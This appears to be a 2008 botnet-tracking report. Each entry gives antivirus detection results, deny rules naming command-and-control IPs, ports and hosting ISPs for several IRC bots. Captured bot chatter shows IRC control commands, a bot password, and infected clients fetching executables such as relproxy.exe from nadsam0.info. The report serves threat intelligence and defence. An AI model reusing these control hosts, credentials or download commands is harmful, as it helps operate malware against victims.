  • Server: GET /is.exe HTTP/1.0Host: nadsam0.info
  • Server: GET /sooo3.exe HTTP/1.0Host: nadsam0.info
  • Server: :hub.40684.com 482 TPTgDfif #fox :You\\'re not channel operator

more....

BotClient Antivirus Diagnoses
AhnLab-V3MISSED
AntiVirTRAgent.69632.71
AuthentiumMISSED
Avast_Rootkit-gen
AVGGeneric10.JXA
BitDefenderDeepScan_Generic.Malware.Q!w.4D346CCF
CAT-QuickHealQhost.akr
ClamAVMISSED
DrWebNoupd
eSafeMISSED
eTrust-VetMISSED
EwidoMISSED
FileAdvisorMISSED
FortinetQhost.AKR!tr
F-ProtSinowal-based!Maximus
F-SecureQhost.akr
IkarusSuspectCrc
KasperskyQhost.akr
McAfeeMISSED
MicrosoftQhost.gen!A
NOD32v2MISSED
NormanMISSED
PandaMISSED
Prevx1Generic10.JXA
RisingMISSED
SophosSusUnkPacker
SunbeltMISSED
SymantecMISSED
TheHackerQhost.akr
VBA32MISSED
VirusBusterMISSED
Webwasher
Gateway
Agent.69632.71
Priority 5 TCP Ports 5190 10324 Filter deny ip host 067.043.236.069 any log ! 5 infects 01/30/08 to 04/12/08 synflood.ws ISP globotech communications
Clients 5 canada Activity Domain synflood.ws
Chatter Example
  • Client: USER dmzmxq dmzmxq dmzmxq :geghzqeuheaqvcid
  • Client: NICK IBLBPrEA
  • Client: MODE IBLBPrEA +xi
  • Client: JOIN #las6 USERHOST IBLBPrEA
  • Client: MODE #las6 +smntu
  • Server: :hub.40684.com 482 IBLBPrEA #las6 :You\\'re not channel operator
  • Client: MODE #rs2 +smntu
  • Server: :hub.40684.com 482 IBLBPrEA #rs2 :You\\'re not channel operator
  • Client: MODE #fox +smntu
  • Server: :hub.40684.com 482 IBLBPrEA #fox :You\\'re not channel operator

more....

BotClient Antivirus Diagnoses
AhnLab-V3MISSED
AntiVirMISSED
AuthentiumMISSED
AvastMISSED
AVGMISSED
BitDefenderMISSED
CAT-QuickHealMISSED
ClamAVMISSED
DrWebMISSED
eSafeMISSED
eTrust-VetMISSED
EwidoMISSED
FileAdvisorMISSED
FortinetMISSED
F-ProtMISSED
F-SecureMISSED
IkarusMISSED
KasperskyMISSED
McAfeeMISSED
MicrosoftMISSED
NOD32v2MISSED
NormanMISSED
PandaMISSED
Prevx1MISSED
RisingMISSED
SophosMISSED
SunbeltMISSED
SymantecMISSED
TheHackerMISSED
VBA32MISSED
VirusBusterMISSED
Webwasher
Gateway
MISSED
Priority 4 TCP Ports 8080 5190 10324 Filter deny ip host 067.043.232.036 any log ! 4 infects 02/04/08 to 04/12/08 synflood.ws ISP globotech communications
Clients 4 canada Activity Domain synflood.ws
Chatter Example
  • Client: USER 1
  • Client: PASS 1
  • Server: RETR MSNGR32.com
  • Client: USER sukbky sukbky sukbky :lnnwofxfwbnyzlpn
  • Client: NICK VmjCUQnK
  • Client: MODE VmjCUQnK +xi
  • Client: JOIN #kham USERHOST VmjCUQnK
  • Client: MODE #kham +smntu
  • Server: :hub.56689.com 482 VmjCUQnK #kham :You\\'re not channel operator
  • Client: JOIN #rs
  • Server: :VmjCUQnK!sukbky@192.168.1.184 JOIN :#rs:hub.56689.com 332...
  • Client: MODE #rs +smntu
  • Client: GET /x.exe HTTP/1.0Host: nadsam0.info
  • Server: GET /relproxy.exe HTTP/1.0Host: nadsam0.info
  • Server: GET /is.exe HTTP/1.0Host: nadsam0.info
  • Server: :hub.56689.com 482 VmjCUQnK #rs :You\\'re not channel operator
  • Server: PING :hub.56689.com
  • Server: PING :hub.56689.com
  • Server: PING :hub.56689.com
  • Server: PING :hub.56689.com
  • Server: PING :hub.56689.com
  • Server: PING :hub.56689.com

more....

BotClient Antivirus Diagnoses
AhnLab-V3Win-Agent.20807
AntiVirTRCrypt.XPACK.Gen
AuthentiumMISSED
AvastMISSED
AVGProxy.YKX
BitDefenderPacker.RLPack.D
CAT-QuickHealTrojanProxy.Agent.mf
ClamAVMISSED
DrWebMISSED
eSafeAgent.mf
eTrust-VetMISSED
EwidoProxy.Agent.mf
FileAdvisorMISSED
FortinetPROXY.IC!tr
F-ProtHeuristic-245!Eldorado
F-SecureMalware
IkarusAgent.BPB
KasperskyTrojan-Proxy.Agent.mf
McAfeeMISSED
MicrosoftTrojanProxy_Agent
NOD32v2MISSED
NormanAgent.EHDV
PandaMISSED
Prevx1Proxy.YKX
RisingMISSED
SophosTrojProxy-IC
SunbeltMISSED
SymantecMISSED
TheHackerProxy.Agent.mf
VBA32Trojan-Proxy.Agent.qd
VirusBusterMISSED
Webwasher
Gateway
Crypt.XPACK.Gen
Priority 4 TCP Ports 55003 Filter deny ip host 084.200.032.209 any log ! 4 infects 04/12/08 to 04/12/08 internet-homing.de ISP internet-homing-gmbh
Clients 4 germany Activity Domain internet-homing.de
Chatter Example
  • Client: NICK USA|00|XP|SP0|L|542429USER omwodb 0 0 :USA|00|XP|SP0|L|542429

more....

BotClient Antivirus Diagnoses
AhnLab-V3MISSED
AntiVirMISSED
AuthentiumMISSED
AvastMISSED
AVGMISSED
BitDefenderMISSED
CAT-QuickHealMISSED
ClamAVMISSED
DrWebMISSED
eSafeMISSED
eTrust-VetMISSED
EwidoMISSED
FileAdvisorMISSED
FortinetMISSED
F-ProtMISSED
F-SecureMISSED
IkarusMISSED
KasperskyMISSED
McAfeeMISSED
MicrosoftMISSED
NOD32v2MISSED
NormanMISSED
PandaMISSED
Prevx1MISSED
RisingMISSED
SophosMISSED
SunbeltMISSED
SymantecMISSED
TheHackerMISSED
VBA32MISSED
VirusBusterMISSED
Webwasher
Gateway
MISSED
Priority 4 TCP Ports 7000 67 10324 5190 Filter deny ip host 072.010.172.213 any log ! 4 infects 04/12/08 to 06/23/08 webdesignpro.org ISP globotech communications
Clients 4 canada Activity Domain webdesignpro.org
Chatter Example
  • Client: PASS trb123trb
  • Client: NICK pulsfpUSER xksdcv \\ \\cqg\\ :xksdcv
  • Server: :pulsfp!xksdcv@192.168.1.161 JOIN :#xddc3:hub.28558.com 353...
  • Client: GET /
  • Client: PASS trb123trb
  • Server: NICK mfiaseUSER mblkpa \\ \\hzk\\ :mblkpa
  • Server: :mfiase!mblkpa@192.168.1.161 JOIN :#xddc3:hub.28558.com 353...
  • Client: PASS trb123trb
  • Server: NICK mjfteaUSER oonrpu \\ ir\\ :oonrpu
  • Server: :mjftea!oonrpu@192.168.1.161 JOIN :#xddc3:hub.28558.com 353...
  • Client: PASS trb123trb
  • Server: NICK qrwuhmUSER pgmydx \\ \\xbz\\ :pgmydx
  • Client: USER htvuxc htvuxc htvuxc :lvgbwifsyiclkgkz
  • Server: NICK WmXDaPxY
  • Client: MODE WmXDaPxY +xi
  • Client: JOIN #las6 USERHOST WmXDaPxY
  • Client: MODE #las6 +smntu
  • Server: :hub.54535.com 482 WmXDaPxY #las6 :You\\'re not channel operator